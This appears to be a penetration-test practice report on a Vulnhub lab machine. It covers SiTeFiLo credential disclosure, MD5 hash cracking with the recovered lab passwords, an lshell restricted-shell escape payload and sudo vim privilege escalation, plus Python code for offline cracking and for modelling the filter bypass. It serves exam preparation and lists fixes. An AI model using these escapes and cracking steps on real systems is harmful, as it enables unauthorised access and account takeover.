OSCP report practice: vulnhub development-improved

With the OSCP exam getting close, I'm doing a few Vulnhub boxes to warm up and, at the same time, practicing writing the report.


Target machine:

https://www.vulnhub.com/entry/digitalworldlocal-development,280/


Where I got stuck:

1. At the critical moment I forgot to view the page source. I went off looking at the visible hint text, and only after reading a walkthrough did I find that the hint was hidden in the page source. A basic mistake.

2. When the page threw an error, it didn't occur to me to search for the file name. Only after reading a walkthrough did I find that Baidu turns up the related exploit.


The OSCP exam report template is here:

https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf


Since section 3 is the part of the report that matters, this write-up follows the layout of section 3 directly.

3.2 Report – Service Enumeration

Server IP Address    Ports Open                  Service / Banner
192.168.92.164       22, 113, 139, 445, 8080     OpenSSH 7.6p1 / ident / Samba smbd 3.X-4.X / HTTP (Apache; nmap banner reports IIS 6.0)

3.3 Report – Penetration

Vulnerability Exploited: SiTeFiLo File Disclosure vulnerability

System Vulnerable: 192.168.92.164

Vulnerability Explanation: The Simple Text-File Login script (SiTeFiLo) suffers from a file disclosure vulnerability (Exploit-DB 7444): its user database, slog_users.txt, can be fetched directly from the web root. The file leaks usernames and unsalted MD5 password hashes; the hashes were cracked and the recovered passwords were reused over SSH. This vulnerability was used to obtain a low-privilege shell.

Privilege Escalation Vulnerability: Credential reuse (the leaked password of user "patrick") combined with a sudo rule that lets patrick run vim as root.

Vulnerability Fix: Update SiTeFiLo to the latest version (or remove it), keep the credential file outside the web root, stop reusing web-application passwords for SSH accounts, and remove the sudo rule for vim (an editor that can spawn a shell is equivalent to a root shell).

Severity: Critical


Information Gathering:


kali@kali:~/Desktop$ sudo nmap -sV 192.168.92.164 -p 1-65535 -n
...
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
113/tcp  open  ident?
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8080/tcp open  http-proxy  IIS 6.0


Browse the web page on port 8080 and view the page source. The hint is in the source, not in the visible text.


Browse http://192.168.92.164:8080/html_pages. The word "development" looks like a hint.


Browse http://192.168.92.164:8080/development.html and view the source code. It points to an interesting page.


Browse http://192.168.92.164:8080/developmentsecretpage/. It contains a link.


Browse http://192.168.92.164:8080/developmentsecretpage/patrick.php. It contains another link.


Browse http://192.168.92.164:8080/developmentsecretpage/patrick.php?logout=1 and try to submit the form.


After submitting the form, the page returns an error that reveals a script file name.


Searching for that file name on Google turns up a sensitive data disclosure bug in the script.

Reference:

https://www.exploit-db.com/exploits/7444


Browse http://192.168.92.164:8080/developmentsecretpage/slog_users.txt. The file is readable without authentication and yields four usernames with their password hashes.


Disclosed credentials (username, MD5 hash):

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb

intern, 4a8a2b374f463b7aedbb44a066363b81

patrick, 87e6d56ce79af90dbe07d387d3d0579e

qiu, ee64497098d0926d198f54f6d5431f98


The hashes are unsalted 32-hex-digit MD5, so a lookup at https://www.somd5.com/ recovers three of the four plaintexts (the admin hash is not found).

Recovered plaintext credentials:

patrick:P@ssw0rd25

intern:12345678900987654321

qiu:qiu
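As an added worked example (not part of the original write-up): parse a file in the slog_users.txt layout shown above and crack its unsalted MD5 hashes offline against a wordlist, instead of pasting the hashes into an online lookup site. The sample file and wordlist are constructed here, with the hashes computed from known passwords so the script runs without the target or any web service; the admin entry is deliberately given a password that is not in the wordlist.

```python
import hashlib


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


# Constructed sample in the "user, md5hex" layout of slog_users.txt.
# The digests are computed here from the passwords so the sample is
# self-consistent; they are not the values disclosed on the target.
SAMPLE_SLOG_USERS = "\n".join([
    "",                                                  # blank line
    f"admin, {_md5('correct horse battery staple')}",   # not in wordlist
    f"intern, {_md5('12345678900987654321')}",
    f"patrick, {_md5('P@ssw0rd25')}",
    f"qiu, {_md5('qiu')}",
])

# Constructed wordlist; a real run would use rockyou.txt or similar.
WORDLIST = ["123456", "qiu", "P@ssw0rd25", "12345678900987654321", "password"]


def parse_slog_users(text: str) -> dict:
    """Return {username: md5hex} from a SiTeFiLo-style user file.

    Each line is 'user, hash'. Blank lines and lines that do not carry a
    32-hex-digit digest are skipped rather than crashing the parser, so a
    partially corrupted file still yields whatever can be recovered.
    """
    users = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or "," not in line:
            continue
        name, _, digest = (p.strip() for p in line.partition(","))
        digest = digest.lower()
        if name and len(digest) == 32 and all(c in "0123456789abcdef" for c in digest):
            users[name] = digest
    return users


def crack_md5(users: dict, wordlist: list) -> dict:
    """Map each username to its plaintext, or None if no wordlist entry matches.

    Because the hashes are unsalted, the wordlist is hashed once and the
    single table serves every user; that reuse is exactly what a per-user
    salt would prevent.
    """
    table = {_md5(w): w for w in wordlist}
    return {name: table.get(digest) for name, digest in users.items()}


if __name__ == "__main__":
    for name, pw in crack_md5(parse_slog_users(SAMPLE_SLOG_USERS), WORDLIST).items():
        print(f"{name}: {pw if pw is not None else '<not in wordlist>'}")
```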


Try the credentials above over SSH. Only user "intern" logs in successfully, and the shell we land in is a restricted shell, lshell.


Note that the command "echo" is allowed. The command after "&&" is written in quotes so that lshell's command check does not recognise it, while the underlying shell strips the quotes and runs it anyway.

escape payload:

echo && 'bash'
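To show why the quoted command slips through, here is an added simplified model (my own illustration, not lshell's code; the exact filter logic is an assumption): a naive allowlist check that discards quoted strings before looking at the command word, beside a hardened check that tokenizes each command the way the shell will, plus a helper showing which programs the real shell would launch.

```python
import re
import shlex

# Commands the restricted shell is supposed to permit (constructed allowlist).
ALLOWED = {"echo", "ls", "cat", "pwd"}

# Split a line into its separate commands on &&, ||, ; and |.
SEPARATORS = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")
# A single- or double-quoted string.
QUOTED = re.compile("'[^']*'|\"[^\"]*\"")


def naive_allowed(line: str) -> bool:
    """Vulnerable check (assumed model): quoted text is treated as harmless
    argument data and removed before the command word is examined, so a
    command written entirely in quotes is never seen by the check."""
    for part in SEPARATORS.split(line):
        stripped = QUOTED.sub("", part).strip()
        if not stripped:
            continue  # nothing but a quoted string: assumed to be an argument
        if stripped.split()[0] not in ALLOWED:
            return False
    return True


def hardened_allowed(line: str) -> bool:
    """Hardened check: tokenize each command with shell quoting rules, so
    'bash' becomes bash before it is compared with the allowlist. Empty
    commands and unbalanced quotes are refused rather than guessed at."""
    for part in SEPARATORS.split(line):
        try:
            tokens = shlex.split(part)
        except ValueError:
            return False
        if not tokens or tokens[0] not in ALLOWED:
            return False
    return True


def shell_would_run(line: str) -> list:
    """The program names the underlying shell actually launches for this
    line, i.e. the first token of each command after quote removal."""
    progs = []
    for part in SEPARATORS.split(line):
        tokens = shlex.split(part)
        if tokens:
            progs.append(tokens[0])
    return progs


if __name__ == "__main__":
    payload = "echo && 'bash'"
    print("naive filter allows:   ", naive_allowed(payload))
    print("hardened filter allows:", hardened_allowed(payload))
    print("shell would launch:    ", shell_would_run(payload))
```

The difference is the order of operations: the naive filter decides on the raw text before quoting is resolved, while the shell resolves quoting first. Any allowlist that does not tokenize the way its executor does is bypassable in this way.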


Enumerate the target:

cat /etc/passwd


Note that there is a local user "patrick". We already have this account's password from the SiTeFiLo disclosure bug.

Use "su" to move laterally to user "patrick" with the password "P@ssw0rd25".


Enumerate the sudo permissions for user "patrick" with "sudo -l": vim may be run as root.


Use vim to get root: because it runs as root under sudo, spawning a shell from inside the editor (":!bash") gives a root shell.



Proof: